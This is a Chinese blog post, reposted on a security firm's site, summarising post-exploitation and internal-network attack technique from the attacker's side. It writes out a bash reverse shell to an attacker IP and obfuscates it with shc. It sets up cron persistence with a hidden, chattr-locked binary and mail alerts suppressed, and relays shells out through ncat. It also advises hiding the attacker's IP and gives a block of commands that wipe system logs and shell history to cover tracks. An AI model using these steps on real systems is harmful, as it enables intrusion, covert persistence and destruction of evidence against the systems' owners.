干货|后渗透及内网初体验的总结_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

干货|后渗透及内网初体验的总结

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


干货|后渗透及内网初体验的总结

绕php的disable_functions 此处建议用AntSword的官方绕过插件全自动绕 绕过失败的可以手动试一下:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions 另外,可以看一下web程序存的数据库的用户名和密码,然后看一下数据库能不能利用,比如写文件或者写日志,以及各种提权,如果绕过disable_functions失败,数据库也不能利用的可以看一下目标服务器上都有什么文件,比如其他站点或者其他可以利用的东西,如果限制了访问目录那就只能留着以后再看了 隐藏ip 隐藏攻击ip还是很重要的,不然容易被溯源,可以上cdn或者用云函数等 但是此处也是有大坑的,能访问国外服务器的目标机器就好办了,直接上就行,但是不能访问国外服务器的目标机器,首先用Cloudflare比较卡,其次用国内的云服务商的则需要实名,而且费用也不低,所以实在没办法就别隐藏ip了,此处我也没有隐藏ip 加密bash反弹shell 正常的bash反弹shell: 目标机器反弹shell: bash -i >& /dev/tcp/攻击机的ip/攻击机接收shell的端口 0>&1 攻击机接收反弹来的shell: nc -lvvp 攻击机接收shell的端口//netcat版本低时l和p参数不兼容,可以nc -lvv port监听端口 用https://github.com/neurobin/shc这个repository加密一下bash脚本,加密后会生成一个c源代码文件和编译之后的二进制文件,把编译之后的二进制文件传到目标机器上执行就行了,可以弥补一下目标机器在国内时不便于隐藏攻击ip的缺陷 本地执行: ./shc -Uvrf reverse.sh -o reverse 把生成的reveser传到目标机器上,执行: ./reverse webshell提供的shell环境限制很多,所以最好先反弹shell,尽量不要正向连接shell,开个端口动静太大 首先是不能弹shell的情况,比如相关的bash,nc等命令都被限制了,那先尝试提权 能弹shell但是接收不到的时候,可以看一下目标是不是限制出网或者限制出站端口 如果限制出网那就先尝试提权,如果限制出站端口可以批量试一下常见的端口,在自己的vps上,通过nginx监听多个端口来快速启动多个端口,然后再在目标机器上上传个sh脚本,批量curl自己vps的指定端口,最后看一下结果就可以了,nmap ---top-ports 100或1000可以扫描nmap整理的100或1000个最常用的端口,可以参考一下 测试出网端口的具体步骤: 1.在正常的nginx配置文件中找到listen port,在后面复制一行,把port改成自己想开放的端口,重启nginx 2.写一个sh脚本,内容就是每行都curl想测试的端口:curl vps:port 3.传到目标机器上,运行并且重定向到文件里:./shfile > result.txt 4.查看result.txt中的结果,就可以看到哪些端口能出网,nmap ---top-ports 100和nmap ---top-ports 1000可以查看nmap整理的100和1000个最常用的端口,可以参考一下 成功收到shell的时候,依旧是个很难用的shell,可以再升级成完全的shell再用,升级之后和真实shell一样,非常舒服 # 攻击机本地执行# 首先检查当前终端和STTY信息$ echo $TERM$ stty -a# 查看输出的rows和columns,后面配置用 # 此时攻击机已经获取到了bash$ python -c 'import pty; pty.spawn("/bin/bash")'$ ctrl + z //快捷键$ stty raw -echo$ fg$ reset //这一步我实测有问题,输了会出问题,不输也没有影响,所以如果输了有问题可以不输$ export SHELL=bash$ export TERM=xterm-256color$ stty rows 行数 columns 列数 此处的这些操作是重复性的,和具体设备无关,所以用xshell的可以写个xshell的脚本或者录制个xshell的脚本,不过我这边录制的时候生成的脚本内容总是为空,应该是个bug,也没时间研究写xshell的脚本了,所以直接用按键精灵写了个 SayString "python -c 'import pty; pty.spawn(""/bin/bash"")'"WaitKeyWaitKeyWaitKeyWaitKeySayString "stty raw -echo"WaitKeyWaitKeySayString "fg"WaitKey WaitKey WaitKeySayString "export SHELL=bash"WaitKey WaitKeySayString "export TERM=xterm-256color"WaitKey WaitKeySayString "stty rows 45 columns 184" 毕竟按键精灵只是模仿输入,不能获取到结果,所以每一步都是只输入,不回车,需要自己回车,而且每一次输入之后会多监听一次任意按键事件,以防想暂停 如果想把这个shell关了,或者这个shell接收到了内网的其他shell,然后想把接收到的其他shell关了,需要输入两次exit退出,然后可能shell的格式是乱的,这时候reset一下就好了 在攻击机上肯定不可能直接就接收shell,如果本地和攻击机的shell连接断了,那么攻击机和目标机器的shell也就断了,或者想把攻击机接收到的shell挂在后台,也不能直接接收shell,此处我推荐使用screen,类似于windows下的多窗口,接收shell的时候新开一个screen挂在后台,不用的时候就在后台挂着,用的时候切过去用就可以了 screen的简单使用教程: 1.screen -S 这个screen会话的名字创建一个screen 2.在screen的会话中时,快捷键ctrl+a,ctrl+d把当前screen放在后台 3.screen -r screen会话的名字恢复一个screen 4.在screen的会话中exit可以退出screen 5.一些小技巧: 1.`screen -list`查看所有的screen会话2.`screen -list`会显示相应对话的pid,通过`kill -9 pid`也可以关闭相应的screen会话3.`screen -d screen会话的名字`可以将一个正在活动的screen放到后台4.如果在screen中嵌套了screen,那么快捷键ctrl+a,ctrl+a,ctrl+d可以把第二层screen放在第一层的后台,快捷键ctrl+a,ctrl+d是不论嵌套几层screen都会把最外层的screen放在后台的 低权限提权 首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Database上找一下,同时看看打没打补丁,如果目标机器不能编译的话可以在自己的机器上编译好了传过去 此处也发现了几个提权工具,不过我试了一下不是很好用,都是靠版本来判断的,和手动搞一样 权限维持 切记要做持久化,不然辛辛苦苦拿的shell可能就要重新拿或者没了,方法很多,可以google搜一下,与时俱进,用最新的东西,下面是一种我常用的权限维持的方式: cron计划任务权限维持比较简单,当然也比较明显: 建议用前面说的shc加密,上传生成的二进制文件,用这个二进制文件弹shell,安全性高一点 上传之后: 1.先chmod +x 二进制文件给一下权限 2.然后在名字前面加个.变为隐藏文件(ls -a可以查看隐藏文件) 3.再尝试一下chattr +i 二进制文件(chattr -i 二进制文件可以解除锁定)防止删除,有相应的权限才能成功执行这条命令 4.最后把这个文件放在安全又隐秘的位置, 配置cron计划任务时,如果是root用户,那就在/etc/crontab里添加,如果不是root用户,那就用crontab -e添加,注意crontab -e需要交互式shell,理论上来说非root用户的cron存在/var/spool/crond下(CentOS),可以直接编辑相应的文件,但是非root用户通常没有权限直接编辑,所以还是需要获取交互式shell然后crontab -e添加 root用户在/etc/crontab里添加的计划任务,通过crontab -l或crontab -e是看不到的 /etc/crontab里应该有默认的配置和默认的例子,crontab -e没有,不管是怎么写cron,都建议使用以下配置: 在写cron之前先执行$PATH查看环境变量并复制,然后再写cron 首先第一行配置为SHELL=+相应的shell位置,第二行配置为PATH=+默认的(如果有的话)加上前面的$PATH,第三行配置为MAILTO="",第三行的意义是计划任务的执行结果不给用户发邮件,因为计划任务反弹shell是不停的反弹,但是攻击机如果之前接收到的shell还没关端口被占用着弹shell就失败了就会报错然后发邮件,发了邮件的话每次执行命令都会提示,很容易就被发现了 最后配置计划任务: root用户配置为* * * * * root /要执行的命令或文件 非root用户配置为* * * * * /要执行的命令或文件 如果要修改执行的间隔可以研究一下cron的语法,上面的是每分钟弹一次shell 内网 信息收集 激动人心的时刻来了,打内网 因为我拿到的shell都是linux下的,没有类似windows上的域控等等,所以此处就扫扫端口,此处可以用nmap,也可以用fscan,强烈推荐fscan,用一次就上瘾,很好用 搭建代理 有些内网ip的端口上跑的比如网站等等在命令行不太好渗透,而且有些内网ip是不出网的,只能通过我们打下来的这个边界服务器来访问,所以建个代理还是很有必要的 此处我推荐用frp,然后依旧遵循动静小点的原则,不在目标机器上开端口,在自己的vps上架设frp的服务端,在目标机器上架设frp的客户端,然后在客户端启用socks5代理插件,这会在服务端上开一个你指定的端口用来做socks5代理,可以配置用户名和密码,还可以远程连接,同时可以搭配其他软件做ip的黑白名单,非常好用,本地配置代理Windows建议用Proxifier,Linux建议用proxychains-ng(proxychains4) 另外也可以用Neo-reGeorg,直接上传个php/jsp等文件就可以建socks5代理,也很好用,对比frp一个优点是只传文件不用执行命令就可以建代理,另一个优点是不用在目标机器上额外在后台挂一个程序 内网渗透 其实和前面的web渗透一样,只不过有些应用在内网比较常见,所以需要去了解一下,搜一下有什么漏洞 fscan本身会检测漏洞,比如各种未授权访问,也会爆破一些端口的服务,比如mysql,ssh或者Tomcat的Manager App的弱口令等 一个C段可以见识不少东西,打了一遍下来竟然天亮了...一天一夜过去了 具体就不细说了,遇见哪个搜哪个,这个C段遇到的web程序基本都是java系的,还有一些python系的 内网不出网反弹shell 目标机器如果不出网可以反弹到已经打下来的内网机器上,也可以再把反弹的端口转发到vps上,实现通过转发出网 通过ncat转发出网: 中转的机器执行: ncat -l 中转机器接收内网反弹来的shell的端口 -c 'ncat 攻击机的ip 攻击机的端口' 这样攻击机就可以接收到不出网的设备弹的shell,唯一的缺点就是中转的机器要占用个端口 中不中转对于不出网的设备的权限维持都是一样的,主要的区别就是在vps上连不出网的设备方便点 痕迹清理 主要是命令的历史记录和日志文件,不过基本清不干净,而且有些地方记录了也清不到,隐藏攻击ip比较万能 下面是一个简单粗暴的清理方式,如无必要不建议使用: echo -n > /var/log/syslogecho -n > /var/log/messagesecho -n > /var/log/httpd/access_logecho -n > /var/log/httpd/error_logecho -n > /var/log/xferlogecho -n > /var/log/secureecho -n > /var/log/auth.logecho -n > /var/log/user.logecho -n > /var/log/wtmpecho -n > /var/log/lastlogecho -n > /var/log/btmpecho -n > /var/run/utmphistory -rhistory -cecho > ~/.bash_historyHISTZISE=0 文章来源:乌云安全 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文

干货|后渗透及内网初体验的总结